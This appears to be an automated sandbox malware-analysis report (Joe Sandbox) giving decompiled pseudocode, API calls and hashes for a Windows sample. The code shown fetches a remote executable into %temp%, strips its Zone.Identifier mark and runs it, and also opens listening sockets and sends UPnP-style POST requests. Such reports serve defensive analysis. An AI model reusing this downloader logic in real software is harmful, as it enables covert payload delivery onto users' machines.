                                                                                  			}
                                                                                  Instruction addresses (per decompiled line, column spilled by extraction): 0x00409886 0x0040988f 0x00409895 0x00409898 0x0040989b 0x0040989e 0x004098a7 0x004098ad 0x004098b3 0x004098bc 0x004098c4 0x004098cd 0x004098d3 0x004098da 0x004098de 0x004098e6 0x004098ee 0x004098f2 0x004098f8 0x004098fb 0x004098fe 0x00409901 0x00409905 0x00409918 0x00409921 0x00409921 0x00409928 0x0040992d 0x00409936

                                                                                  APIs
                                                                                  • htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409840: inet_addr.WS2_32(004098C1), ref: 0040984A
                                                                                    • Part of subcall function 00409840: gethostbyname.WS2_32(?), ref: 0040985D
                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                  • getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  Strings
                                                                                  • www.update.microsoft.com, xrefs: 004098B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                  • String ID: www.update.microsoft.com
                                                                                  • API String ID: 4063137541-1705189816
                                                                                  • Opcode ID: 41d3bc95c2ae44e72b32e24321ad9851a133240d3f3aeb102b77493bcdced1bd
                                                                                  • Instruction ID: 4856549373dc0ba92a891a61f9ce0befa44decce286b311d22d51fdce19958fb
                                                                                  • Opcode Fuzzy Hash: 41d3bc95c2ae44e72b32e24321ad9851a133240d3f3aeb102b77493bcdced1bd
                                                                                  • Instruction Fuzzy Hash: A121F9B5E102099BCB04DFF8D946AEEBBB5AF08310F10816DE519F3390E7745A45CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 22%
                                                                                  			E0040E110(void* __edi) {
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				char _v28;
                                                                                  				void* __ebx;
                                                                                  				void* _t15;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t27 = __edi;
                                                                                  				_t24 = E00408E40(0x24);
                                                                                  				 *_t24 = 0x756470;
                                                                                  				 *(_t24 + 4) = 1;
                                                                                  				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                  				 *(_t24 + 0x10) = _t15;
                                                                                  				__imp__#23(2, 2, 0x11);
                                                                                  				 *(_t24 + 8) = _t15;
                                                                                  				if(_t15 == 0xffffffff) {
                                                                                  					E0040E0A0(_t24, __edi);
                                                                                  					_t24 = 0;
                                                                                  				}
                                                                                  				if(_t24 == 0) {
                                                                                  					L6:
                                                                                  					return _t24;
                                                                                  				} else {
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#2( *(_t24 + 8),  &_v28, 0x10);
                                                                                  					if(2 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                  						 *((intOrPtr*)(_t24 + 0x14)) = CreateThread(0, 0, E0040DE70, _t24, 0, 0);
                                                                                  						goto L6;
                                                                                  					} else {
                                                                                  						E0040E0A0(_t24, _t27);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}
                                                                                  Instruction addresses (per decompiled line, column spilled by extraction): 0x0040e110 0x0040e122 0x0040e128 0x0040e12e 0x0040e135 0x0040e141 0x0040e144 0x0040e14a 0x0040e150 0x0040e152 0x0040e157 0x0040e157 0x0040e15b 0x0040e1ba 0x0040e1c0 0x0040e15d 0x0040e15f 0x0040e163 0x0040e167 0x0040e16b 0x0040e17b 0x0040e185 0x0040e18e 0x0040e1ae 0x0040e1b7 0x00000000 0x0040e190 0x0040e190 0x0040e19b 0x0040e19b 0x0040e18e

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040C2CE,00000000), ref: 0040E135
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040E144
                                                                                  • bind.WS2_32(?,?,00000010), ref: 0040E185
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,00009E34,0040DD0D), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?), ref: 0040E0C7
                                                                                  • CreateThread.KERNEL32 ref: 0040E1B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3943618503-0
                                                                                  • Opcode ID: d6b533783e4c3d5a0b0c07ca28ff5c32efd1b8c96d42e38e33aba7220e01ff04
                                                                                  • Instruction ID: 22c9fd0d58bb21ad2c775b164571bc0b545b0ff679c75b8c31fe2abd1e05f37e
                                                                                  • Opcode Fuzzy Hash: d6b533783e4c3d5a0b0c07ca28ff5c32efd1b8c96d42e38e33aba7220e01ff04
                                                                                  • Instruction Fuzzy Hash: E1119170640300AFE7509FB4DC86B5B7AE0EF48710F54897AFA58DE2D2E6F8D844875A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D890(char* _a4, signed int _a8) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				signed char _v1045;
                                                                                  				short _v1572;
                                                                                  				void* _v1576;
                                                                                  				void* _v1580;
                                                                                  				short _v2100;
                                                                                  				void _v2364;
                                                                                  				long _v2368;
                                                                                  				long _v2372;
                                                                                  				void* _v2376;
                                                                                  				intOrPtr* _v2380;
                                                                                  				intOrPtr _v2384;
                                                                                  				char _v2385;
                                                                                  				intOrPtr _v2392;
                                                                                  				signed int _t88;
                                                                                  				signed int _t90;
                                                                                  				int _t96;
                                                                                  				signed int _t97;
                                                                                  				signed int _t99;
                                                                                  				signed int _t101;
                                                                                  				signed int _t111;
                                                                                  				signed char _t125;
                                                                                  				signed char _t127;
                                                                                  				void* _t181;
                                                                                  				void* _t182;
                                                                                  				void* _t184;
                                                                                  
                                                                                  				srand(GetTickCount());
                                                                                  				_t182 = _t181 + 4;
                                                                                  				_v1045 = 0;
                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                  				_v2380 = _a4;
                                                                                  				_v2384 = _v2380 + 1;
                                                                                  				do {
                                                                                  					_v2385 =  *_v2380;
                                                                                  					_v2380 = _v2380 + 1;
                                                                                  				} while (_v2385 != 0);
                                                                                  				_v2392 = _v2380 - _v2384;
                                                                                  				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                  				_t88 = rand();
                                                                                  				asm("cdq");
                                                                                  				_t90 = rand();
                                                                                  				asm("cdq");
                                                                                  				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                  				_t184 = _t182 + 0x20;
                                                                                  				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 0, 0, 0, 0);
                                                                                  				if(_v2376 != 0) {
                                                                                  					_v1576 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0);
                                                                                  					if(_v1576 != 0) {
                                                                                  						_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
                                                                                  						if(_v1580 != 0xffffffff) {
                                                                                  							while(InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372) != 0 && _v2372 != 0) {
                                                                                  								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0);
                                                                                  							}
                                                                                  							CloseHandle(_v1580);
                                                                                  							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  							DeleteFileW( &_v524);
                                                                                  							Sleep(0x3e8);
                                                                                  							_t125 = E0040D580( &_v1572);
                                                                                  							_t184 = _t184 + 0x10;
                                                                                  							if((_t125 & 0x000000ff) == 0) {
                                                                                  								DeleteFileW( &_v1572);
                                                                                  							} else {
                                                                                  								Sleep(0x7d0);
                                                                                  								_t127 = E0040D740( &_v1572);
                                                                                  								_t184 = _t184 + 4;
                                                                                  								if((_t127 & 0x000000ff) == 1) {
                                                                                  									if((_a8 & 0x000000ff) == 1) {
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v1045 = 1;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						CloseHandle(_v1580);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v1576);
                                                                                  				}
                                                                                  				InternetCloseHandle(_v2376);
                                                                                  				Sleep(0x3e8);
                                                                                  				_t96 = _v1045 & 0x000000ff;
                                                                                  				if(_t96 == 0) {
                                                                                  					_t97 = rand();
                                                                                  					asm("cdq");
                                                                                  					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                  					_t99 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t101 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push( &_v1572);
                                                                                  					_push( &_v1044);
                                                                                  					_push(0);
                                                                                  					L0040F052();
                                                                                  					if(_t96 == 0) {
                                                                                  						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  						DeleteFileW( &_v524);
                                                                                  						Sleep(0x3e8);
                                                                                  						if((E0040D580( &_v1572) & 0x000000ff) == 0) {
                                                                                  							return DeleteFileW( &_v1572);
                                                                                  						}
                                                                                  						Sleep(0x7d0);
                                                                                  						_t111 = E0040D740( &_v1572) & 0x000000ff;
                                                                                  						if(_t111 == 0 || (_a8 & 0x000000ff) != 1) {
                                                                                  							return _t111;
                                                                                  						} else {
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t96;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040D899
                                                                                  • srand.MSVCRT ref: 0040D8A0
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D8C0
                                                                                  • mbstowcs.NTDLL ref: 0040D923
                                                                                  • rand.MSVCRT ref: 0040D92B
                                                                                  • rand.MSVCRT ref: 0040D93F
                                                                                  • wsprintfW.USER32 ref: 0040D966
                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D97C
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D9AB
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D9DA
                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040DA0D
                                                                                  • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040DA3E
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040DA4D
                                                                                  • wsprintfW.USER32 ref: 0040DA66
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DA76
                                                                                  • ExitProcess.KERNEL32 ref: 0040DACA
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DAA2
                                                                                    • Part of subcall function 0040D740: memset.NTDLL ref: 0040D74E
                                                                                    • Part of subcall function 0040D740: CreateProcessW.KERNEL32 ref: 0040D795
                                                                                    • Part of subcall function 0040D740: Sleep.KERNEL32(000003E8), ref: 0040D7A5
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DAE0
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040DAED
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DAFA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DB07
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DB12
                                                                                  • rand.MSVCRT ref: 0040DB27
                                                                                  • Sleep.KERNEL32 ref: 0040DB3E
                                                                                  • rand.MSVCRT ref: 0040DB44
                                                                                  • rand.MSVCRT ref: 0040DB58
                                                                                  • wsprintfW.USER32 ref: 0040DB7F
                                                                                  • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040DB9C
                                                                                  • wsprintfW.USER32 ref: 0040DBBC
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DBCC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DBD7
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DA81
                                                                                    • Part of subcall function 0040D580: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                    • Part of subcall function 0040D580: CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                    • Part of subcall function 0040D580: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                    • Part of subcall function 0040D580: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DBF8
                                                                                  • ExitProcess.KERNEL32 ref: 0040DC1F
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DC2E
                                                                                  Strings
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D977
                                                                                  • %s\%d%d.exe, xrefs: 0040D95A
                                                                                  • %s\%d%d.exe, xrefs: 0040DB73
                                                                                  • %temp%, xrefs: 0040D8BB
                                                                                  • %s:Zone.Identifier, xrefs: 0040DBB0
                                                                                  • %s:Zone.Identifier, xrefs: 0040DA5A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 3135114409-2996245764
                                                                                  • Opcode ID: ed997d2d8adc84e834c24ccd0979c921d068e9e5e7f299f91d7423c8729aec1f
                                                                                  • Instruction ID: 9292b30b737f4007fadc37ef56157f39d8097e5f89b4cfd55e16e9e87d2adf29
                                                                                  • Opcode Fuzzy Hash: ed997d2d8adc84e834c24ccd0979c921d068e9e5e7f299f91d7423c8729aec1f
                                                                                  • Instruction Fuzzy Hash: CF91C7B1D41318ABEB20DB50DC45FEA7775BB88705F0484F9F609A61C1DAB89AC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 364 40e7a0-40e7c7 GetTickCount WaitForSingleObject 365 40e949-40e94f 364->365 366 40e7cd-40e7e4 WSAWaitForMultipleEvents 364->366 367 40e870-40e883 GetTickCount 366->367 368 40e7ea-40e801 WSAEnumNetworkEvents 366->368 369 40e8c3-40e8cc GetTickCount 367->369 370 40e885-40e894 EnterCriticalSection 367->370 368->367 371 40e803-40e808 368->371 372 40e935-40e943 WaitForSingleObject 369->372 373 40e8ce-40e8dd EnterCriticalSection 369->373 374 40e896-40e89d 370->374 375 40e8ba-40e8c1 LeaveCriticalSection 370->375 371->367 376 40e80a-40e810 371->376 372->365 372->366 377 40e921-40e931 LeaveCriticalSection GetTickCount 373->377 378 40e8df-40e8f7 InterlockedExchangeAdd call 40c210 373->378 379 40e8b5 call 40e6a0 374->379 380 40e89f-40e8a7 374->380 375->372 376->367 381 40e812-40e831 accept 376->381 377->372 389 40e917-40e91f 378->389 390 40e8f9-40e902 378->390 379->375 380->374 384 40e8a9-40e8b0 LeaveCriticalSection 380->384 381->367 382 40e833-40e842 call 40e330 381->382 382->367 391 40e844-40e85f call 40e5c0 382->391 384->372 389->377 389->378 390->389 392 40e904-40e90d call 409940 390->392 391->367 397 40e861-40e867 391->397 392->389 397->367 398 40e869-40e86b call 40eb70 397->398 398->367
                                                                                  C-Code - Quality: 82%
                                                                                  			E0040E7A0(intOrPtr* _a4) {
                                                                                  				intOrPtr _v64;
                                                                                  				char _v68;
                                                                                  				long _v72;
                                                                                  				signed char _v80;
                                                                                  				long _v92;
                                                                                  				char _v96;
                                                                                  				char _v100;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __ebp;
                                                                                  				long _t31;
                                                                                  				long _t33;
                                                                                  				long _t34;
                                                                                  				long _t42;
                                                                                  				intOrPtr _t49;
                                                                                  				intOrPtr* _t56;
                                                                                  				intOrPtr _t70;
                                                                                  				intOrPtr* _t73;
                                                                                  				long _t74;
                                                                                  				intOrPtr _t75;
                                                                                  				struct _CRITICAL_SECTION* _t76;
                                                                                  				intOrPtr* _t77;
                                                                                  				void* _t78;
                                                                                  				signed int _t79;
                                                                                  				void* _t81;
                                                                                  
                                                                                  				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                  				_t31 = GetTickCount();
                                                                                  				_t56 = _a4;
                                                                                  				_v72 = _t31;
                                                                                  				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				if(_t33 == 0) {
                                                                                  					L25:
                                                                                  					return _t33;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					_t73 = _t56 + 0x18;
                                                                                  					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                  					if(_t33 != 0x102) {
                                                                                  						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                  						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                  							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                  							_v100 = 0x10;
                                                                                  							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                  							if(_t49 != 0xffffffff) {
                                                                                  								_t77 = E0040E330(_t56, _t49);
                                                                                  								_t81 = _t81 + 4;
                                                                                  								if(_t77 != 0) {
                                                                                  									_t15 = _t77 + 0x264; // 0x264
                                                                                  									E0040E5C0(0, _t77, _t56, _t15);
                                                                                  									_t81 = _t81 + 8;
                                                                                  									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                  										E0040EB70(_t77);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_t34 = GetTickCount();
                                                                                  					_t74 = _v92;
                                                                                  					if(_t34 - _t74 < 0x3e8) {
                                                                                  						if(GetTickCount() - _t74 < 0x2710) {
                                                                                  							goto L24;
                                                                                  						}
                                                                                  						EnterCriticalSection(_t56 + 0x20);
                                                                                  						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  						if(_t75 == 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(_t56 + 0x20);
                                                                                  							_v92 = GetTickCount();
                                                                                  							goto L24;
                                                                                  						} else {
                                                                                  							goto L19;
                                                                                  						}
                                                                                  						do {
                                                                                  							L19:
                                                                                  							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                  							if(E0040C210() - _t42 >= 0x1e) {
                                                                                  								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                  								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                  									E00409940(_t45);
                                                                                  									_t81 = _t81 + 4;
                                                                                  									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                  								}
                                                                                  							}
                                                                                  							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                  						} while (_t75 != 0);
                                                                                  						goto L23;
                                                                                  					}
                                                                                  					_t76 = _t56 + 0x20;
                                                                                  					EnterCriticalSection(_t76);
                                                                                  					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  					if(_t70 == 0) {
                                                                                  						L16:
                                                                                  						LeaveCriticalSection(_t76);
                                                                                  						goto L24;
                                                                                  					}
                                                                                  					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                  						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                  						if(_t70 != 0) {
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							LeaveCriticalSection(_t76);
                                                                                  							goto L24;
                                                                                  						}
                                                                                  					}
                                                                                  					E0040E6A0(_t56, _t70, _t78);
                                                                                  					goto L16;
                                                                                  					L24:
                                                                                  					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				} while (_t33 != 0);
                                                                                  				goto L25;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040E7AC
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E7BF
                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E7D9
                                                                                  • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E7F6
                                                                                  • accept.WS2_32(?,?,?), ref: 0040E828
                                                                                  • GetTickCount.KERNEL32 ref: 0040E876
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E889
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8AA
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8BB
                                                                                  • GetTickCount.KERNEL32 ref: 0040E8C3
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E8D2
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E8E5
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E925
                                                                                  • GetTickCount.KERNEL32 ref: 0040E92B
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E93B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 3345448188-3762367603
                                                                                  • Opcode ID: 21530c16b04613800cb5c1967301639b7ffc4cd3d4e3b063b4a76a46442c98f0
                                                                                  • Instruction ID: a4307afca7aad85b9c9d9f5dd23984def65cc417f4fb2f5aaa278dd0cd3fd46e
                                                                                  • Opcode Fuzzy Hash: 21530c16b04613800cb5c1967301639b7ffc4cd3d4e3b063b4a76a46442c98f0
                                                                                  • Instruction Fuzzy Hash: AE4117725002009BCB10AF36DC88B9B77A4AB44720F048E39F899A72D1D778EC95CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040D110(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				char* _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char _v852;
                                                                                  				long _v856;
                                                                                  				void _v1884;
                                                                                  				long _v1888;
                                                                                  				void* _t102;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t103 = _t102 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                  							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                  							_t29 =  &_v852; // 0x410928
                                                                                  							if(HttpSendRequestA(_v848,  *_t29, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                  								_v856 = 0;
                                                                                  								while(1 != 0) {
                                                                                  									_t98 = _v848;
                                                                                  									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                  										_v776 = E00408EA0(_v776, _t98, _v776, _v856 + _v1888);
                                                                                  										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                  										_t103 = _t103 + 0x14;
                                                                                  										_v856 = _v856 + _v1888;
                                                                                  										continue;
                                                                                  									}
                                                                                  									break;
                                                                                  								}
                                                                                  								 *_a16 = _v856;
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}

                                                                                  0x0040d119
                                                                                  0x0040d123
                                                                                  0x0040d138
                                                                                  0x0040d13d
                                                                                  0x0040d140
                                                                                  0x0040d150
                                                                                  0x0040d156
                                                                                  0x0040d166
                                                                                  0x0040d16c
                                                                                  0x0040d188
                                                                                  0x0040d1a1
                                                                                  0x0040d1ae
                                                                                  0x0040d1da
                                                                                  0x0040d1e7
                                                                                  0x0040d210
                                                                                  0x0040d21d
                                                                                  0x0040d235
                                                                                  0x0040d23b
                                                                                  0x0040d251
                                                                                  0x0040d267
                                                                                  0x0040d26d
                                                                                  0x0040d277
                                                                                  0x0040d297
                                                                                  0x0040d2a6
                                                                                  0x0040d2cf
                                                                                  0x0040d2f0
                                                                                  0x0040d2f5
                                                                                  0x0040d304
                                                                                  0x00000000
                                                                                  0x0040d304
                                                                                  0x00000000
                                                                                  0x0040d2a6
                                                                                  0x0040d318
                                                                                  0x0040d318
                                                                                  0x0040d321
                                                                                  0x0040d321
                                                                                  0x0040d32e
                                                                                  0x0040d32e
                                                                                  0x0040d33b
                                                                                  0x0040d33b
                                                                                  0x0040d34a

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D138
